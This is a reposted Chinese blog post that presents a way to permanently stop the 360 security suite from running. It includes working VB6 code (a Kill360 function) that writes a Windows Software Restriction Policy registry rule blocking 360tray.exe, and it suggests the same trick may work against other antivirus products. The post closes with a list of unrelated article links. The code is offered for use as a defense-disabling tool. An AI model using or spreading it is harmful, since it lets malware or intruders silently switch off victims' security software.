今天无意中发现一个漏洞,可以轻松干掉360,就是利用Windows的启动机制实现拦截360的运行。Windows中有一个叫做软件限制策略的功能,可以用来限制应用程序的运行,和IFEO比较像,只不过IFEO早已过时,而且被360彻底封杀掉了,而windows的进程启动限制机制360倒没有注意到。于是,直接写一个限制360启动的规则加入注册表,这样360就再也无法启动了,这下360终于不牛B了吧,哈哈!此漏洞在360安全卫士9.1+WindowsXP/SP3下测试成功。同样地,此漏洞或许也适用于其它杀毒软件,不过有待测试。

 1 Option Explicit
 2 Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
 3 Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
 4 Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
 5 Private Declare Function lstrlen Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
 6
 7 Private Const HKEY_LOCAL_MACHINE = &H80000002
 8
 9 Private Const REG_SZ = 1
10 Private Const REG_QWORD = 11
11 Private Const REG_DWORD = 4
12
13 '永久封锁掉360禁止它再启动
14 Public Function Kill360() As Boolean
15         Dim hKey As Long
16         Dim lRet As Long
17         Dim strFileName As String
18         Dim bytData(0 To 7) As Byte
19         strFileName = "360tray.exe" '360的文件名,这里以路径规则举例
20         lRet = RegCreateKey(HKEY_LOCAL_MACHINE, "SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{487462c2-2064-4e1f-aeae-20b7095a41bb}", hKey)
21         If lRet = 0 Then
22                 lRet = RegSetValueEx(hKey, "Description", 0&, REG_SZ, ByVal vbNullString, 0)
23                 lRet = RegSetValueEx(hKey, "ItemData", 0&, REG_SZ, ByVal strFileName, lstrlen(strFileName))
24                 lRet = RegSetValueEx(hKey, "LastModified", 0&, REG_QWORD, bytData(0), 8)
25                 lRet = RegSetValueEx(hKey, "SaferFlags", 0&, REG_DWORD, 0, 4)
26                 RegCloseKey hKey
27                 Kill360 = (lRet = 0)
28         End If
29 End Function

转载于:https://www.cnblogs.com/CodingMouse/p/3330301.html

利用Windows的启动机制实现拦截360的运行相关推荐

  1. 怎么在windows上启动python_Windows下如何安装和运行Python

    介绍了在Windows下如何安装和运行Python的方法. 工具/原料 含有Windows操作系统的笔记本电脑 Python安装包 方法/步骤 1 进入Python官网,下载Python安装执行文件, ...

  2. Linux启动跟windows启动,Windows,Linux启动机制简介

    前言 本文内容只集中在操作系统启动原理的讲解上,不涉及启动的技术细节,因为这些细节都可以通过网络或者相关代码了解.只有了解了启动原理,才能在分析和解决有关启动的问题时具有针对性,不会有无从下手的感觉. ...

  3. 利用JDK动态代理机制实现简单拦截器

    利用JDK动态代理机制实现简单的多层拦截器 首先JDK动态代理是基于接口实现的,所以我们先定义一个接口 public interface Executer {public Object execute ...

  4. 快速复现利用Log4j漏洞启动windows计算器

    了解关于漏洞的描述,可以参考Vulnerability Affecting Multiple Log4j Versions Permits RCE Exploit 根据文章描述,首先下载JDK1.8u ...

  5. fontdrvhost占用高_迄今为止有关Windows 10安全机制最深入的分析

    概要 微软在北京时间2015年1月22日,公布了其新一代操作系统Windows 10的新技术预览版,并在随后的北京时间1月24日向公众开放了该预览版本的下载(Build:9926).在这个新的Wind ...

  6. [译] APT分析报告:04.Kraken - 新型无文件APT攻击利用Windows错误报告服务逃避检测

    这是作者新开的一个专栏,主要翻译国外知名的安全厂商APT报告文章,了解它们的安全技术,学习它们溯源APT组织的方法,希望对您有所帮助.前文分享了APT组织Fin7 / Carbanak的Tirion恶 ...

  7. 转载《利用Windows系统自带命令手工搞定病毒》_原水_新浪博客

    转载 360软件百科的文章,其实WINDOWS有很多的命令我们不熟悉,你认真看下就会发现其他的操作系统其实就是这样做的,只是我们没有想到WINDOWS也可以这样做. 利用Windows系统自带命令手工 ...

  8. 利用Windows系统自带命令手工搞定病毒

    上网最恐怖的事莫过于新病毒出来的时候,尽管电脑上我们都装有各种强大的杀毒软件,也配置了定时自动更新病毒库,但病毒总是要先于病毒库的更新的, 所以中招的每次都不会是少数,这里列举一些通用的杀毒方法,自己 ...

  9. 有关Win8快速启动机制探讨

    Win8个性化:一个花费两三年时间,数千人开发,参与测试人数达到数百万的产品,其中必然有不少值得我们去探讨分享的新技术和新功能,Win8正是这样一款产品.作为世界上最流行的操作系统的最新版本,Win8 ...

最新文章

  1. torch 判断gpu可用
  2. svn提示out of date的解决方法
  3. JDK下载与安装、 Eclipse下载与使用、 Tomcat下载与使用、 MySQL安装与使用
  4. 如何创建一个最小的串口、TTY设备包括虚拟控制台,串口以及伪终端设备的驱动程序
  5. Segment Routing MPLS介绍
  6. torch.nn.parallel.DistributedDataParallel使用中卡在第一个epoch的原因之一
  7. latex怎么让table下面空白变小_LaTeX:pgf usepackage(宏包)的中译
  8. 2.4 数值分析: Doolittle直接三角分解法
  9. c#实现16进制和字符串之间转换
  10. 转载--32个鲜为人知的自学网站
  11. 中职学校计算机基础的重要性,中职非计算机专业学生计算机基础教学浅探
  12. 一篇关于程序员的文章
  13. 计算机毕业设计asp.net193酒店客房预订网站系统
  14. 冉宝的每日一题--8月6日、8月7日--今天想学会拓扑排序
  15. 【已解决】 ‘gbk‘ codec can‘t decode byte 0x93 in position 3136: illegal multibyte sequence
  16. h5文件格式数据集制作
  17. android 闪光灯 频闪,技术丨频闪人像的闪光灯调节和拍摄要点
  18. 基于MATLAB的人脸识别提纲
  19. 基于ssm技术的校自助阅览室的设计与实现 毕业设计-附源码242326
  20. java基础学习之JSP动态web开发技术

热门文章

  1. 美国自动驾驶研发国家队NASA入局,还提供了航天跑道做测试
  2. 马克·扎克伯格分享Facebook水冷数据中心照片
  3. iwebshop关于按钮点击提示的系列代码操作流程
  4. Android开发— 2016_最流行的Android组件、工具、框架大全(二)
  5. iOS开源项目周报1229
  6. AchartEngine绘图引擎
  7. jQuery自动完成点击html元素
  8. 诺拉公司2.6一亿元天价罚款侵权 宅男心中的入侵
  9. 交互设计[小插曲]--网站UI配色
  10. struts2标签库的使用